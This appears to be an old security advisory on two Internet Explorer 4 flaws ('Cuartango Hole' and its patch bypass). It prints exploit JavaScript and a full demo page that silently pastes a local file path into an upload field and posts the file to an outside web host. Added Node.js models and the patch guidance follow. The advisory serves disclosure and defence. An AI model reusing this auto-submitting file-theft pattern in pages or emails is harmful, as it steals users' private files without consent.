COMMAND
IE
SYSTEMS AFFECTED
Win 9x, NT with IE 4.01 (w/ and w/o SP1) and 5PR
PROBLEM
Juan Carlos G. Cuartango of Spain has discovered an extremely
serious security hole in Internet Explorer 4. With a small amount
of JavaScript code on a Web page, a Web site operator can steal
any file whose path is known from a user's hard disk and
automatically upload its contents to a Web server. More worrisome
is the fact that the hole can also be exploited from an HTML-based
e-mail message in Outlook Express: simply reading a booby-trapped
message can cause private files to be stolen from the hard disk.
Most computer users will consider this an unacceptable product
defect. Details of the security hole were posted at Mr. Cuartango's site:
http://pages.whowhere.com/computers/cuartangojc/cuartangoh1.html
The Web site also contains a demo of the security problem. The
demo is based on a standard HTML file-upload form. Normally only
the user can set the name of the file to be uploaded, but IE4
inadvertently lets JavaScript drive the copy and paste commands
and so set the file name from script. Once the file name is set,
the script auto-submits the form and the file is uploaded.
The following is taken from the site above. There is an input form
field used to transfer files from the browsing computer to a Web
site; it is coded in HTML as:
<input type="file" name="filename" size="30">
In theory this field can be filled only by the user, by clicking
the "Browse" button or typing the file name. To avoid an obvious
security hole, script is not allowed to modify the value of this
field, so the statement below does not work (very clever MS
Explorer programmers):
document.forms[0].filename.value = "C:\\config.sys";
What the Microsoft programmers forgot is that the "copy" and
"paste" commands are available to script in Internet Explorer 4,
and the file input field was not protected against them.
The attack is then straightforward:
1- Create a second form with a hidden field named "T1" containing
the path of the file you want to steal.
2- From the HTML body's onload event, fire a script:
<body onload="getfile()">
<script language="JavaScript">
function getfile()
{
  document.forms[1].T1.select();        // select the hidden field holding the path
  document.execCommand("copy");         // the path is now on the clipboard
  document.forms[0].filename.select();  // move the selection into the file input
  document.execCommand("paste");        // IE4 accepts the paste where assignment is refused
  document.forms[0].submit();           // POST the file to the form's action URL
}
</script>
The result is that the file is POSTED to the malicious Web site
given in the form's action attribute. There is a second security
issue here: the contents of the user's clipboard can be sent to a
malicious Web site simply by performing a "paste" into an ordinary
text input box and submitting the form. The source code of the
demo page looks like this:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<title>Cuartango Hole 2</title>
<script language="JavaScript">
function getfile()
{
  document.forms[1].T1.select();        // hidden field holding the path
  document.execCommand("copy");
  document.forms[0].filename.select();  // file input of the upload form
  document.execCommand("paste");
  window.open("cuartangoh3.html");      // opens another page of the demo
  document.forms[0].submit();
}
</script>
</head>
<body onload="getfile()">
<!-- form 0: the upload form; action is the site that receives the file -->
<form enctype="multipart/form-data" method="post" action="http://www.angelfire.com/cgi-bin/bedit">
<input type="hidden" name="storage" value="ab">
<input type="hidden" name="hpd" value="cuartangojc">
<input type="hidden" name="password" value="asisea">
<p><strong>I am transfering your file</strong> <input type="file" name="filename" size="30"> <strong>to my web site </strong> </p>
</form>
<!-- form 1: holds the path to steal; it is never submitted -->
<form method="POST">
<input type="hidden" name="T1" value="/test.txt"><p> </p>
</form>
<p align="center">Transfer # <img src="/cgi-bin/Count.cgi" width="97" height="24"></p>
</body>
</html>
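What the receiving CGI actually gets once submit() fires is a
multipart/form-data POST carrying the hidden fields and the contents
of whichever file the pasted path named. The Node.js code below is an
added example, not Cuartango's code and not part of the demo: it
builds the body a browser would send for the demo form above with a
constructed file, then parses it the way the attacker's server would.
The boundary string, the file path and the file contents are made up;
the hidden field names and values are those of the demo form.

```javascript
"use strict";

// Boundary and file contents are constructed for this example.
const BOUNDARY = "---------------------------7d83a1b2example";

// Hidden fields of the demo form (form 0 on the page) plus the stolen file.
const DEMO_FIELDS = { storage: "ab", hpd: "cuartangojc", password: "asisea" };
const STOLEN_FILE = {
  field: "filename",                  // name of the <input type="file">
  path: "C:\\test.txt",               // what the script pasted into the field
  type: "text/plain",
  content: "constructed: contents of the victim's file\r\nline two\r\n",
};

// Encode the form the way a browser does for enctype="multipart/form-data":
// one part per field, the file part carrying the pasted path as its filename.
function buildMultipart(fields, file, boundary = BOUNDARY) {
  const parts = [];
  for (const [name, value] of Object.entries(fields)) {
    parts.push(`--${boundary}\r\n` +
               `Content-Disposition: form-data; name="${name}"\r\n\r\n` +
               `${value}\r\n`);
  }
  parts.push(`--${boundary}\r\n` +
             `Content-Disposition: form-data; name="${file.field}"; filename="${file.path}"\r\n` +
             `Content-Type: ${file.type}\r\n\r\n` +
             `${file.content}\r\n`);
  parts.push(`--${boundary}--\r\n`);
  return parts.join("");
}

// Decode a body of that shape, as the attacker's CGI would. Returns the plain
// fields and, separately, every part that carried a filename (the loot).
function parseMultipart(body, boundary = BOUNDARY) {
  const result = { fields: {}, files: [] };
  for (let chunk of body.split(`--${boundary}`)) {
    if (chunk === "" || chunk.startsWith("--")) continue;   // preamble or closing delimiter
    chunk = chunk.replace(/^\r\n/, "").replace(/\r\n$/, ""); // CRLF framing around the part
    const split = chunk.indexOf("\r\n\r\n");
    if (split < 0) continue;                                 // malformed part: skip it
    const headers = chunk.slice(0, split);
    const content = chunk.slice(split + 4);
    // "name=" must be preceded by space/semicolon so "filename=" does not match.
    const name = /(?:^|[\s;])name="([^"]*)"/.exec(headers);
    if (!name) continue;
    const filename = /filename="([^"]*)"/.exec(headers);
    if (filename) result.files.push({ name: name[1], filename: filename[1], content });
    else result.fields[name[1]] = content;
  }
  return result;
}

// Round trip: what the demo's action URL receives for the constructed file.
function exfiltratedByDemo() {
  return parseMultipart(buildMultipart(DEMO_FIELDS, STOLEN_FILE));
}

console.log(JSON.stringify(exfiltratedByDemo(), null, 2));
```

The server never sees the victim's path as a path, only as the
filename attribute of the part, but it does get every byte of the
file; on a proxy, an unexpected multipart POST with a filename part
from a browser session that the user did not initiate is the visible
trace of this attack.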
The bug is reported to be present in the IE5 preview release and in
IE 4.01 (with and without SP1), but not in the first IE 4.0 release.
A program called TegoSoft WebExpress is also reported to do the same
thing using an ActiveX control, and to run the file as well.
Shortly afterwards the same researcher found a related bug that
bypassed the protection added by Microsoft's initial fix. This
variant has been called the Son of Cuartango Hole. Microsoft named
the original issue "Untrusted Scripted Paste" (USP) and published a
fix for it which, unfortunately, did not close the problem
completely. The target is the same file-transfer input field:
<input type="file" name="filename" size="30">
As before, this field can in theory be filled only by the user, by
clicking the "Browse" button or typing the file name, and script is
still refused a direct assignment such as:
document.forms[0].filename.value = "C:\\config.sys";
The Cuartango Hole showed that a single scripted "copy and paste"
could write a file name into the field, and Microsoft's first USP
patch blocked exactly that one operation: document.execCommand("paste")
while the file input is selected. The bypass makes "paste" work
again by taking a different route to the same field: create a
TextRange object from the current selection (which is the file
input) and call execCommand("paste") on the range instead of on the
document. The code below is a bit more sophisticated than the
"Cuartango Hole" code; T1 is again a hidden input field in a second
form that holds the pathname to be copied to the clipboard.
<body onload="getfile()">
<script language="JavaScript">
function getfile()
{
  document.forms[1].T1.select();                 // hidden field holding the path
  document.execCommand("copy");                  // the path is now on the clipboard
  document.forms[0].filename.select();           // selection now sits in the file input
  var rng = document.selection.createRange();    // TextRange over that selection
  rng.execCommand("paste");                      // paste via the range: not covered by the first patch
  document.forms[0].submit();                    // POST the file to the form's action URL
}
</script>
The result is that the file is POSTED to the malicious Web site
given in the form's action attribute. Equivalent code also works
inside an HTML-formatted e-mail. Any file on the computer whose
path is known can therefore be sent to a Web site by a malicious
script, whether that script comes from a Web page or from an HTML
e-mail.
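The two holes together illustrate a class of incomplete fix: the
first USP patch blocked the one paste route the demo used, while the
TextRange route reached the same field untouched. The Node.js code
below is an added model, not Internet Explorer's code and not a
description of how Microsoft implemented either patch: it gives a toy
file input a single write method, puts three invented guard policies
in front of it (unpatched IE4, IE4 with the first USP patch, IE4 with
the corrected patch) and runs the direct-assignment, document-paste
and range-paste routes against each. The policy names, entry-point
labels and the idea of the corrected patch as a check on the field
itself are the model's own assumptions.

```javascript
"use strict";

// Added model, not Internet Explorer code: a toy file input whose every
// scripted write passes through one method, and three guard policies that
// stand in for IE4 unpatched, IE4 with the first USP patch, and IE4 with the
// corrected patch. Policy and entry-point names are invented for the model.

class FileInput {
  constructor(guard) {
    this._value = "";      // the path the form would upload on submit()
    this._guard = guard;   // policy consulted before every scripted write
  }
  get value() { return this._value; }

  // The sink: every route script has to the field ends here. `via` names
  // the entry point so a policy can (unwisely) decide per entry point.
  write(path, via) {
    if (!this._guard(via)) return false;  // write refused
    this._value = path;
    return true;
  }
}

// Simulated clipboard shared by the two forms on the attack page.
const clipboard = { text: "" };

// The three ways the page's script could try to get a path into the field.
const entryPoints = {
  // document.forms[0].filename.value = path  (always refused)
  assignment:    (field, path) => field.write(path, "assignment"),
  // T1.select(); execCommand("copy"); filename.select(); execCommand("paste")
  documentPaste: (field, path) => {
    clipboard.text = path;
    return field.write(clipboard.text, "document.execCommand");
  },
  // same copy, then document.selection.createRange().execCommand("paste")
  rangePaste:    (field, path) => {
    clipboard.text = path;
    return field.write(clipboard.text, "TextRange.execCommand");
  },
};

// Guards: return true to allow the write.
const browsers = {
  // Unpatched IE4: only direct assignment is refused (the Cuartango Hole).
  ie4_unpatched: (via) => via !== "assignment",
  // First USP patch: also refuses document.execCommand("paste"), one entry
  // point at a time, leaving the TextRange route open (Son of Cuartango).
  ie4_usp_patch1: (via) => via !== "assignment" && via !== "document.execCommand",
  // Corrected patch, as modelled here: the rule lives at the sink, so no
  // scripted write is allowed whatever route it took.
  ie4_usp_patch2: () => false,
};

// Does this browser leak the file when the script uses this entry point?
function leaks(browserName, entryPointName, wantedPath = "C:\\config.sys") {
  const field = new FileInput(browsers[browserName]);
  entryPoints[entryPointName](field, wantedPath);
  return field.value === wantedPath;   // true: submit() would upload it
}

// Full matrix: browser version x entry point.
function leakMatrix() {
  const m = {};
  for (const b of Object.keys(browsers)) {
    m[b] = {};
    for (const e of Object.keys(entryPoints)) m[b][e] = leaks(b, e);
  }
  return m;
}

console.table(leakMatrix());
```

The matrix reproduces the sequence in the advisory: the first patch
closes the route the demo used and nothing else, because it sits on
one caller rather than on the field, while a check on the field covers
routes nobody has tried yet. When reviewing a fix for this class of
bug, either enumerate every caller that can reach the sink or move the
check into the sink.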
SOLUTION
On November 18th Microsoft released an updated version of the
patch for the "Untrusted Scripted Paste" vulnerability. The
updated patch fixes the original vulnerability as well as a
newly-discovered variant.
Windows 98
==========
Windows 98 customers can obtain the updated patch using Windows
Update. To obtain this patch using Windows Update, launch
Windows Update from the Windows Start Menu and click "Product
Updates." When prompted, select 'Yes' to allow Windows Update
to determine whether this patch and other updates are needed by
your computer. If your computer does need this patch, you will
find it listed under the "Critical Updates" section of the page.
Internet Explorer 4.01
======================
Customers using Internet Explorer 4.01 can obtain the patch from
the Internet Explorer Security web site:
http://www.microsoft.com/ie/security/paste.htm
Administrative Workaround
=========================
If the user has disabled the default warning that is displayed
when submitting unencrypted forms, re-enabling this feature can
provide additional protection. The warning prompt makes sure
users are alerted if a script attempts to submit data using
forms. Users should be cautious if they see this warning when
browsing and have not actually chosen to submit any data. To
turn on this prompt:
1. From Internet Explorer, choose "Internet Options" from the
"View" menu.
2. Click on the tab labeled "Security".
3. Click on "Internet Zone", then click "Customize Settings".
4. Scroll to "Submit non-encrypted form data" and click on
"Prompt".
The same procedure should be followed for the "Restricted Sites"
Zone. Additionally, users who cannot apply the patch immediately
can disable Active Scripting technologies in Internet Explorer to
protect themselves from this issue. Please note that the Zones
security feature in Internet Explorer 4 can be used to disable
Active Scripting (VBScript and JScript) in untrusted or unknown
Internet sites, while still permitting it in trusted and known
sites.